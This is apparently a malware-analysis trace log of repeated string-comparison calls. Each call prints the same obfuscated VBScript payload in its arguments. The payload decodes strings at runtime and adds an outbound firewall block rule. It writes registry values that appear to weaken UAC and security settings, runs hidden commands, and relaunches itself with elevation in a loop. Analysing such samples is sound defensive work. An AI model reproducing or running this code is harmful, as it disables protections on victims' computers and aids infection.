bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.327] wcsncmp (_String1="6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41 [0226.327] wcsncmp (_String1="\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0226.327] wcsncmp (_String1="\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.327] wcsncmp (_String1="const NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.327] wcsncmp (_String1="onst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 